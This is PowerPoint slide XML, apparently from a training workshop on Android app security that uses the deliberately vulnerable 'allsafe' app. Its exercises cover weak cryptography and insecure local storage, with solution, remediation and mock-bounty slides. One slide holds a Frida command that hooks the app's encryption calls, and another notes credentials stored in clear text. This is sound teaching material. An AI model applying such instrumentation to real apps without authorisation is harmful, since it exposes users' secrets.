              <a:t> Frida script to trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> API calls :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/FSecureLABS/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Exemple d’utilisation :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l tracer-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cipher.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-pause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Follow OWASP best practices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7 : Exploiting Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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286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SzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Check the MSTG :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
              <a:t> [section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
              <a:t> for Mobile Apps]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>depracted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> crypto :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-and/or-deprecated-cryptographic-algorithms</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> configuration issues :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0" err="1"/>
              <a:t>owasp-mstg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
              <a:t>/blob/master/Document/0x04g-Testing-Cryptography.md#common-configuration-issues</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Exercice 7 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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422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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>differentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> approches to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>persist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>locally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> : key-value XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> system /data/data/&lt;package-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>shared_prefs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>prefs_name.xml</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> application has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>isolated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>readble</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>installed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: SQLite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Realm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>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Local Storage </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583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lgn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> user data, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> know if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>it’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> for us ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> Data Storage in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>Vine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t> Android App </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId2" invalidUrl="https:///"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0">
                <a:hlinkClick r:id="rId3" invalidUrl="https:///"/>
              </a:rPr>
              <a:t>hackerone.com/reports/44727</a:t>
            </a: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Exploiting Local Storage </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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3805734" y="5413338"/>
            <a:ext cx="1413336" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>ADB</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761747" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>140 $</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B37C686-FB10-42C9-AD61-C48D825BC233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2910" t="4658" r="50004" b="64471"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="957518" y="5922630"/>
            <a:ext cx="1088231" cy="535781"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22507706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Exploiting Local Storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>[Solution] </a:t>
            </a:r>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3C3CE608-8678-46D4-839B-928FE6834286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="1473202"/>
            <a:ext cx="8503057" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>storing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>SharedPreferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> » :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A12E09F-6E37-43C9-998E-DEC1F1901B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="21220"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2738534"/>
            <a:ext cx="7924800" cy="3451631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11634634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a:t>Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>bounty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58370" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.20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1974850"/>
            <a:ext cx="965200" cy="96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466145367"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3377247" y="32831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 $ 140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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
